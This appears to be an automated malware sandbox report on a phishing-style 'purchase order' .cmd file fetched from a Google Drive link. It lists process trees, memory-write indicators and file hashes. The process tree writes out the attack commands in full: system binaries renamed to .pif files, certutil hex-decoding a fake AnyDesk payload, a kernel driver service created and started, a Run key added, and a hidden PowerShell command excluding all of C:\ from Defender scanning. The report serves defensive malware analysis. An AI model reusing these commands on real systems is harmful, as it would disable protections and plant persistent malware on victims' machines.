pid Process 4116 firefox.exe 4116 firefox.exe 4116 firefox.exe 4116 firefox.exe 4116 firefox.exe 4116 firefox.exe 4116 firefox.exe 4596 OpenWith.exe 4596 OpenWith.exe 4596 OpenWith.exe 4596 OpenWith.exe 4596 OpenWith.exe 3908 OpenWith.exe 3908 OpenWith.exe 3908 OpenWith.exe 3908 OpenWith.exe 3908 OpenWith.exe 3908 OpenWith.exe 3908 OpenWith.exe 3908 OpenWith.exe 3908 OpenWith.exe 3908 OpenWith.exe 3908 OpenWith.exe 3908 OpenWith.exe 3908 OpenWith.exe 3908 OpenWith.exe 3908 OpenWith.exe 3908 OpenWith.exe 2368 OpenWith.exe 2368 OpenWith.exe 2368 OpenWith.exe 2368 OpenWith.exe 2368 OpenWith.exe 2368 OpenWith.exe 2368 OpenWith.exe 2368 OpenWith.exe 2368 OpenWith.exe 2368 OpenWith.exe 2368 OpenWith.exe 2368 OpenWith.exe 2368 OpenWith.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 5012 wrote to memory of 4116 5012 firefox.exe 77 PID 5012 wrote to memory of 4116 5012 firefox.exe 77 PID 5012 wrote to memory of 4116 5012 firefox.exe 77 PID 5012 wrote to memory of 4116 5012 firefox.exe 77 PID 5012 wrote to memory of 4116 5012 firefox.exe 77 PID 5012 wrote to memory of 4116 5012 firefox.exe 77 PID 5012 wrote to memory of 4116 5012 firefox.exe 77 PID 5012 wrote to memory of 4116 5012 firefox.exe 77 PID 5012 wrote to memory of 4116 5012 firefox.exe 77 PID 5012 wrote to memory of 4116 5012 firefox.exe 77 PID 5012 wrote to memory of 4116 5012 firefox.exe 77 PID 4116 wrote to memory of 3392 4116 firefox.exe 78 PID 4116 wrote to memory of 3392 4116 firefox.exe 78 PID 4116 wrote to memory of 3392 4116 firefox.exe 78 PID 4116 wrote to memory of 3392 4116 firefox.exe 78 PID 4116 wrote to memory of 3392 4116 firefox.exe 78 PID 4116 wrote to memory of 3392 4116 firefox.exe 78 PID 4116 wrote to memory of 3392 4116 firefox.exe 78 PID 4116 wrote to memory of 3392 4116 firefox.exe 78 PID 4116 wrote to memory of 3392 4116 firefox.exe 78 PID 4116 wrote to memory of 3392 4116 firefox.exe 78 PID 4116 wrote to memory of 3392 4116 firefox.exe 78 PID 4116 wrote to memory of 3392 4116 firefox.exe 78 PID 4116 wrote to memory of 3392 4116 firefox.exe 78 PID 4116 wrote to memory of 3392 4116 firefox.exe 78 PID 4116 wrote to memory of 3392 4116 firefox.exe 78 PID 4116 wrote to memory of 3392 4116 firefox.exe 78 PID 4116 wrote to memory of 3392 4116 firefox.exe 78 PID 4116 wrote to memory of 3392 4116 firefox.exe 78 PID 4116 wrote to memory of 3392 4116 firefox.exe 78 PID 4116 wrote to memory of 3392 4116 firefox.exe 78 PID 4116 wrote to memory of 3392 4116 firefox.exe 78 PID 4116 wrote to memory of 3392 4116 firefox.exe 78 PID 4116 wrote to memory of 3392 4116 firefox.exe 78 PID 4116 wrote to memory of 3392 4116 firefox.exe 78 PID 4116 wrote to memory of 3392 4116 firefox.exe 78 PID 4116 wrote to memory of 3392 4116 firefox.exe 78 PID 4116 wrote to memory of 3392 4116 firefox.exe 78 PID 4116 wrote to memory of 3392 4116 firefox.exe 78 PID 4116 wrote to memory of 3392 4116 firefox.exe 78 PID 4116 wrote to memory of 3392 4116 firefox.exe 78 PID 4116 wrote to memory of 3392 4116 firefox.exe 78 PID 4116 wrote to memory of 3392 4116 firefox.exe 78 PID 4116 wrote to memory of 3392 4116 firefox.exe 78 PID 4116 wrote to memory of 3392 4116 firefox.exe 78 PID 4116 wrote to memory of 3392 4116 firefox.exe 78 PID 4116 wrote to memory of 3392 4116 firefox.exe 78 PID 4116 wrote to memory of 3392 4116 firefox.exe 78 PID 4116 wrote to memory of 3392 4116 firefox.exe 78 PID 4116 wrote to memory of 3392 4116 firefox.exe 78 PID 4116 wrote to memory of 3392 4116 firefox.exe 78 PID 4116 wrote to memory of 3392 4116 firefox.exe 78 PID 4116 wrote to memory of 3392 4116 firefox.exe 78 PID 4116 wrote to memory of 3392 4116 firefox.exe 78 PID 4116 wrote to memory of 3392 4116 firefox.exe 78 PID 4116 wrote to memory of 3392 4116 firefox.exe 78 PID 4116 wrote to memory of 4624 4116 firefox.exe 79 PID 4116 wrote to memory of 4624 4116 firefox.exe 79 PID 4116 wrote to memory of 4624 4116 firefox.exe 79 PID 4116 wrote to memory of 4624 4116 firefox.exe 79 PID 4116 wrote to memory of 4624 4116 firefox.exe 79 PID 4116 wrote to memory of 4624 4116 firefox.exe 79 PID 4116 wrote to memory of 4624 4116 firefox.exe 79 PID 4116 wrote to memory of 4624 4116 firefox.exe 79 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "https://drive.google.com/uc?export=download&id=1f5N2KUSixpDxaS-FXrVZwJQqbXgI7Zmp"1⤵
- Suspicious use of WriteProcessMemory
PID:5012 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url https://drive.google.com/uc?export=download&id=1f5N2KUSixpDxaS-FXrVZwJQqbXgI7Zmp2⤵
- Checks processor information in registry
- Modifies registry class
- NTFS ADS
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4116 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1980 -parentBuildID 20240401114208 -prefsHandle 1896 -prefMapHandle 1888 -prefsLen 23678 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {058c4424-4c36-4d4a-98a1-d06e91cdd57e} 4116 "\\.\pipe\gecko-crash-server-pipe.4116" gpu3⤵PID:3392
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2416 -parentBuildID 20240401114208 -prefsHandle 2392 -prefMapHandle 2380 -prefsLen 24598 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {27424fe8-86b8-456d-a601-8acc72994389} 4116 "\\.\pipe\gecko-crash-server-pipe.4116" socket3⤵PID:4624
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3284 -childID 1 -isForBrowser -prefsHandle 3308 -prefMapHandle 3336 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 936 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ed23b672-aea2-4c99-91a7-b4c5e702d71e} 4116 "\\.\pipe\gecko-crash-server-pipe.4116" tab3⤵PID:4724
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3648 -childID 2 -isForBrowser -prefsHandle 3640 -prefMapHandle 2724 -prefsLen 29088 -prefMapSize 244658 -jsInitHandle 936 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a8b62c2d-2cbe-4418-b5f7-d36e54bc1c0d} 4116 "\\.\pipe\gecko-crash-server-pipe.4116" tab3⤵PID:1920
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4652 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4648 -prefMapHandle 4644 -prefsLen 29088 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e4153580-411f-4ffd-be2e-cfcd9f70a601} 4116 "\\.\pipe\gecko-crash-server-pipe.4116" utility3⤵
- Checks processor information in registry
PID:3376
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5528 -childID 3 -isForBrowser -prefsHandle 5520 -prefMapHandle 5436 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 936 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {dfbe454a-9123-4630-906f-ed63eef3e793} 4116 "\\.\pipe\gecko-crash-server-pipe.4116" tab3⤵PID:1528
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5544 -childID 4 -isForBrowser -prefsHandle 5536 -prefMapHandle 5532 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 936 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {255206c9-74ed-48d0-bde9-9b4ed60f9681} 4116 "\\.\pipe\gecko-crash-server-pipe.4116" tab3⤵PID:932
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5792 -childID 5 -isForBrowser -prefsHandle 5912 -prefMapHandle 5920 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 936 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {14e3c783-5ce9-4e08-a737-80000c36f40c} 4116 "\\.\pipe\gecko-crash-server-pipe.4116" tab3⤵PID:1320
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1476 -childID 6 -isForBrowser -prefsHandle 6392 -prefMapHandle 3596 -prefsLen 33913 -prefMapSize 244658 -jsInitHandle 936 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {820571c3-9ed4-4268-b45a-382c9d04ed32} 4116 "\\.\pipe\gecko-crash-server-pipe.4116" tab3⤵PID:4940
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6600 -childID 7 -isForBrowser -prefsHandle 4632 -prefMapHandle 5164 -prefsLen 28140 -prefMapSize 244658 -jsInitHandle 936 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {249bcb82-6539-4aa9-ace3-5dda8b4a8307} 4116 "\\.\pipe\gecko-crash-server-pipe.4116" tab3⤵PID:5980
-
-
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:4596
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:3552
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\REQUIRED-PO-AND-COMPANY-PROFILE\" -ad -an -ai#7zMap30217:122:7zEvent4631⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4728
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:3908
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SDRSVC1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5000
-
C:\Windows\system32\BackgroundTransferHost.exe"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.131⤵
- Modifies registry class
PID:1900
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\REQUIRED-PO-AND-COMPANY-PROFILE\REQUIRED-PO-AND-COMPANY-PROFILE.cmd" "1⤵PID:3840
-
C:\Windows\system32\extrac32.exeextrac32 /C /Y "C:\\Windows\\System32\\wlrmdr.exe" "C:\\Users\\Public\\awpha.pif"2⤵PID:1840
-
-
C:\Windows\system32\extrac32.exeextrac32 /C /Y "C:\\Windows\\System32\\cmd.exe" "C:\\Users\\Public\\alpha.pif"2⤵PID:1532
-
-
C:\Windows\system32\extrac32.exeextrac32 /C /Y "C:\\Windows\\System32\\certutil.exe" "C:\\Users\\Public\\phf.pif2⤵PID:3092
-
-
C:\Users\Public\alpha.pifC:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\phf.pif -decodehex -F "C:\Users\Admin\Downloads\REQUIRED-PO-AND-COMPANY-PROFILE\REQUIRED-PO-AND-COMPANY-PROFILE.cmd" "C:\\Users\\Public\\AnyDesk.avi" 92⤵
- Executes dropped EXE
PID:4504 -
C:\Users\Public\phf.pifC:\\Users\\Public\\phf.pif -decodehex -F "C:\Users\Admin\Downloads\REQUIRED-PO-AND-COMPANY-PROFILE\REQUIRED-PO-AND-COMPANY-PROFILE.cmd" "C:\\Users\\Public\\AnyDesk.avi" 93⤵
- Executes dropped EXE
PID:3644
-
-
-
C:\Users\Public\alpha.pifC:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\phf.pif -decodehex -F "C:\\Users\\Public\\AnyDesk.avi" "C:\\Users\\Public\\Libraries\\AnyDesk.pif" 122⤵
- Executes dropped EXE
PID:4596 -
C:\Users\Public\phf.pifC:\\Users\\Public\\phf.pif -decodehex -F "C:\\Users\\Public\\AnyDesk.avi" "C:\\Users\\Public\\Libraries\\AnyDesk.pif" 123⤵
- Executes dropped EXE
PID:4252
-
-
-
C:\Users\Public\awpha.pif"C:\Users\Public\awpha.pif" -s 3600 -f 0 -t _ -m _ -a 11 -u C:\Users\Public\Libraries\AnyDesk.pif2⤵
- Executes dropped EXE
PID:3992 -
C:\Users\Public\Libraries\AnyDesk.pif"C:\Users\Public\Libraries\AnyDesk.pif"3⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:4848 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\FlkgqskqF.cmd" "4⤵
- System Location Discovery: System Language Discovery
PID:5972
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd4⤵
- System Location Discovery: System Language Discovery
PID:1492 -
C:\Windows \SysWOW64\svchost.pif"C:\Windows \SysWOW64\svchost.pif"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:4840 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\NEO.cmd6⤵PID:5492
-
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.pif7⤵PID:5440
-
-
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\sc.exe C:\\Users\\Public\\Upha.pif7⤵PID:5168
-
-
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\aken.pif7⤵PID:5528
-
-
C:\Users\Public\alpha.pifC:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\Upha.pif create TrueSight binPath="C:\Windows \SysWOW64\truesight.sys" type= kernel start= auto7⤵
- Executes dropped EXE
PID:5148 -
C:\Users\Public\Upha.pifC:\\Users\\Public\\Upha.pif create TrueSight binPath="C:\Windows \SysWOW64\truesight.sys" type= kernel start= auto8⤵
- Executes dropped EXE
PID:5360
-
-
-
C:\Users\Public\alpha.pifC:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\Upha.pif start TrueSight7⤵
- Executes dropped EXE
PID:5416 -
C:\Users\Public\Upha.pifC:\\Users\\Public\\Upha.pif start TrueSight8⤵
- Executes dropped EXE
PID:5180
-
-
-
C:\Users\Public\alpha.pifC:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\aken.pif -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath 'C:\'"7⤵
- Executes dropped EXE
PID:4504 -
C:\Users\Public\aken.pifC:\\Users\\Public\\aken.pif -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath 'C:\'"8⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3644
-
-
-
-
-
-
C:\Users\Public\Libraries\qksqgklF.pifC:\Users\Public\Libraries\qksqgklF.pif4⤵PID:3852
-
-
-
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2368
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\jj59r4xg.default-release\activity-stream.discovery_stream.json
Filesize24KB
MD599ac7a21e3c3b3bbf1f076247c0ce59c
SHA16b8f8898e45de7db4622a6c9ac19248d32b9ed44
SHA256b2a5a2f73c568b558ca95e8ca541532b1c84e714d0ec352901f84d8998347cce
SHA512267b3f250ab583307e1147745f48127bd82f8fe36c92bb44917c68fac2cd81572c43cbfc96e9d3a41076f4e298b27ee5bd291dc73e4aadfac2369bfca8ab6f27
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\jj59r4xg.default-release\cache2\entries\D3997B5E4365FF84BBECDA3D1939508B5A2ED9DD
Filesize220KB
MD550a6c12ac0f53f37ee3188f757d686f9
SHA1d0c5dfebfab5f1e18e4e6e15218e24c4c405d029
SHA256d673f5dcca74f08668e335467d5c45cfb653f14cead8f374d9bdfcd1befcb6d8
SHA512c7886b4d3207fe07d8adb37d5d32b5cceb888d1520b067d012fa06fa42e85815ef9c98f9ace6989e5d6379b215d9d930cf67825a1c37de8df76bc39c5e97e448
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\jj59r4xg.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl
Filesize15KB
MD596c542dec016d9ec1ecc4dddfcbaac66
SHA16199f7648bb744efa58acf7b96fee85d938389e4
SHA2567f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798
SHA512cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\BackgroundTransferApi\d7acf649-032f-42e4-ab1c-81c3797af5d2.down_data
Filesize555KB
MD55683c0028832cae4ef93ca39c8ac5029
SHA1248755e4e1db552e0b6f8651b04ca6d1b31a86fb
SHA256855abd360d8a8d6974eba92b70cbd09ce519bc8773439993f9ab37cb6847309e
SHA512aba434bd29be191c823b02ea9b639beb10647bbe7759bbffdaa790dfb1ec2c58d74c525ef11aacda209e4effe322d1d3a07b115446c8914b07a3bce4d8a0e2c3
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
479KB
MD509372174e83dbbf696ee732fd2e875bb
SHA1ba360186ba650a769f9303f48b7200fb5eaccee1
SHA256c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f
SHA512b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1
-
Filesize
13.8MB
MD50a8747a2ac9ac08ae9508f36c6d75692
SHA1b287a96fd6cc12433adb42193dfe06111c38eaf0
SHA25632d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03
SHA51259521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\jj59r4xg.default-release\AlternateServices.bin
Filesize6KB
MD5d945a46f33ee97fc15d4b513a35a0a62
SHA110be2bd6826dc5c945652574c9b308995228a944
SHA256a2bed28caa0dc782078f6bc77ff8df473b2f725dc7ab2c223e0a6d639495453b
SHA512ea16f67882860ac398237efcbc7e81e71d3dd63348070e230f10ea0ea4db0868fd48d34f38efa0f0645c3b716df3269c0f2a44145c4218d78457665d60cd8f90
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\jj59r4xg.default-release\AlternateServices.bin
Filesize7KB
MD522b0c25b8dc24e144140706ab7072dc4
SHA1001e41d881c953d866a8cd40cfac2aadc89b25c2
SHA2561d46ce0746b1fbd7640940c90e362979c777b31aa06a4468646cafe05c2d085b
SHA512122dc39dd5530940b842db3a61b3f9abc2420df0650907c15cfafff422c8ea8378199e18525656d95a1424c7f1567551de47185edaba9f64ea697b89bf6e26de
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\jj59r4xg.default-release\AlternateServices.bin
Filesize11KB
MD5b2d7da01c5532b6b36e407af3e9c141b
SHA153d421a6171c2307f15912b22a1f2d52758d57f6
SHA256f341b458d9b11efcc64d1452b7183491083dc53262436bb2c9e3700545d89c12
SHA51242bf75b0a55da21b856b677d9ccb6ee83965f3780a8cc754d45ee4a80f183aec3370cdc305d5cc5e77a9eb97518fa4513fa0ee83450c8896219b05a0280a7f3e
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\jj59r4xg.default-release\datareporting\glean\db\data.safe.tmp
Filesize5KB
MD59abb1386493f783878079367c0b6cf69
SHA1aebf1a2e99ddba557f5cbc06139c754d494feb0b
SHA256f8b9587c6118377f7d87619b0ef84a8cd3a51186ea8a646f4679c6e6b5f62f54
SHA5120cea3fe35f6d02fed546395851639476306ba53589fd551122d785c4f092958368973a01691d3d353c91d83d6774d148d7bb95a318ec314cb7bc35ee9a2a7659
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\jj59r4xg.default-release\datareporting\glean\db\data.safe.tmp
Filesize5KB
MD517e81dfb8edfdbb4f7888e83356db183
SHA1dad76a4076d56b64cafec82a28554786f6412f97
SHA25681716f9961798d094146f5eb2200e4a04f80c7ecc7a8a4c25be9b7e727e249de
SHA51280036e80806011f85b4d8b6b92009c3c7554b68b13f616b768a10353adb9532ff323b72de85f4fe898fedabf807abd1de803596c715793969b0dd12c12ef6f82
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\jj59r4xg.default-release\datareporting\glean\pending_pings\025ee1c5-6bd3-4afa-84a4-473e175b3eae
Filesize671B
MD5075d72bb488a07469628b0ceb18ff92a
SHA15e5e6cbf56749a8c3abe177b544394e8e857adc1
SHA256f446df95582ffd864f274ed3b0c69e3eff1f8534e71e63768ddd343d6e6d127d
SHA5127493e46f484ac527bd1c6d078042bc4cd986b3d8b0f2f6e1c0c245c203e9d809883c60a4a518f3c2fc246dc8686a979c7fb4a6f226f6a5debc04acda737e4e81
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\jj59r4xg.default-release\datareporting\glean\pending_pings\4d2778a1-dc07-43d6-a3ea-97258e25937c
Filesize982B
MD522470610a52ff4d86892183f8cce9c48
SHA1f8ba8666cc03d1e7e373e10cdaddc5e63fef74a2
SHA2563578664cdd7551c77997765c2eaab64c3a9d2ab8068cec5a74500d28455df8a0
SHA5126a1ebfc24e37948970a5e23c77de3a953b0799e9d15ba33f2f12adc9d0574e89e96a605f76f2bb5ed527887739968c058857de435b3d576c0c08d2394e23a417
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\jj59r4xg.default-release\datareporting\glean\pending_pings\59c12c63-d557-4ddd-854c-dde8842f5c02
Filesize26KB
MD53df5a5a5a9d269b913ef8b803b89d24b
SHA1b2a948d2c3e54de22f83f64b320bbcba4708dad1
SHA256ef770cf1382bb1a3380aee3d7b08303c53d5b7b116373a85844479073c58b304
SHA512a04dc6575962942f7ffd6c492bf94ae93a56ee1147b62c47c7fd6d3e2536d64a3766caba4e2549a741fc9060747670510a085917174fda05ed9376566acf5d86
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\jj59r4xg.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll
Filesize1.1MB
MD5842039753bf41fa5e11b3a1383061a87
SHA13e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153
SHA256d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c
SHA512d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\jj59r4xg.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info
Filesize116B
MD52a461e9eb87fd1955cea740a3444ee7a
SHA1b10755914c713f5a4677494dbe8a686ed458c3c5
SHA2564107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc
SHA51234f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\jj59r4xg.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json
Filesize372B
MD5bf957ad58b55f64219ab3f793e374316
SHA1a11adc9d7f2c28e04d9b35e23b7616d0527118a1
SHA256bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda
SHA51279c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\jj59r4xg.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll
Filesize17.8MB
MD5daf7ef3acccab478aaa7d6dc1c60f865
SHA1f8246162b97ce4a945feced27b6ea114366ff2ad
SHA256bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e
SHA5125840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75
-
Filesize
10KB
MD58d952d1993ccfd1970d050e0ef550c90
SHA1ece2eddceae5611c039241a8aa3575bc95da460d
SHA256b40b9d6a4ac4cea85b5c8afb8dd2cbadf66773c679521eebf9c6511d57e88504
SHA5126d7a408def3d66ac5ebde6645f05523c5baa3833373a5fd7b2abb3ccd1f147bd907279b30a30823ad20d835b6b0443688e06297e82847ee0fb4bc9eaf65aa1ce
-
Filesize
10KB
MD5cc07b8eda2a02fcdd0f66d6df3362ba3
SHA1c5990de13630f83d37ff5616dbb8be301674ad02
SHA2565c77cb18bcfee1c4c690e2abb869d6598b5cfdee9a5505a8763b2303c491568d
SHA51230263607048b1b8a8a8e26460507cf419c082637c6ed20ff596078e10b14a66b26ccd43fb58a55771b03d90008125d59652b9b4e7e9bb51e1387ff58decbd777
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\jj59r4xg.default-release\sessionstore-backups\recovery.baklz4
Filesize1KB
MD58287dbbacca15b2ee7c25bc61886ba54
SHA14dc4a8ff24c029768734e6f1fbc4951616453928
SHA256b6abbe2c162062fde0ea9317de0614d1be70199af0383ba00e115c5b8bbfd9fa
SHA512c7fb21c933013923093ec9b68b179619aeacaefb1a4e69dd0bf17a2c68a63c87901d42bbe0bee15cd521e8484070df80cde63b4dcc4bdce71e6674cfdb578ba3
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\jj59r4xg.default-release\sessionstore-backups\recovery.baklz4
Filesize1KB
MD5f83088b45fe2bedbfc9fc5161d4ece93
SHA162902b9199dfbe97aa0bb811c75b110d64371689
SHA25638b7170d28651a2ca793d867f7e7262e4147fa579e6a96c2080ce187202319b9
SHA512345521430d9ac0003a0d43b12d2c43fd73718d7d368d64e94e6d4c6fa68ba065eb8b117555535c440ab6d6d85b926e3c921e3e01057707b13a0bffb744cf5d5e
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\jj59r4xg.default-release\sessionstore-backups\recovery.baklz4
Filesize1KB
MD54fa0312a9cff09b358fa808e35529619
SHA1cfed47d6b8cbb5b6017f1035ed99163129d09929
SHA256bed7b43f2950ad0ebcd5c7c23be8cd7da226fa09d7ecca3b4a366118e700e364
SHA5122103ec249e6bebc40433ad36fa3f1905fd329201228fc88abe00796274a12944db3e6c66eb2863417a8ae7ec0db99b262db07f5e785bbfac98d7af3bc8301778
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\jj59r4xg.default-release\sessionstore-backups\recovery.baklz4
Filesize4KB
MD5444f848f447af6cbe650cf1571fc2688
SHA1f8e43dcec77c982149ffd35d71d1b1b3cb5e3df9
SHA25643a3e120b28ce83519a61ca952d56efaecec7dfe35d8ca2d38b85daf7942729c
SHA512381f391bb19e8b98d799fd9f964cc180acec138efe4336c5f3d88860c8e6f248ffb64bfc8f0c3f98529b56a9b420201e945bcf197c1ca414ee198b6b75901bde
-
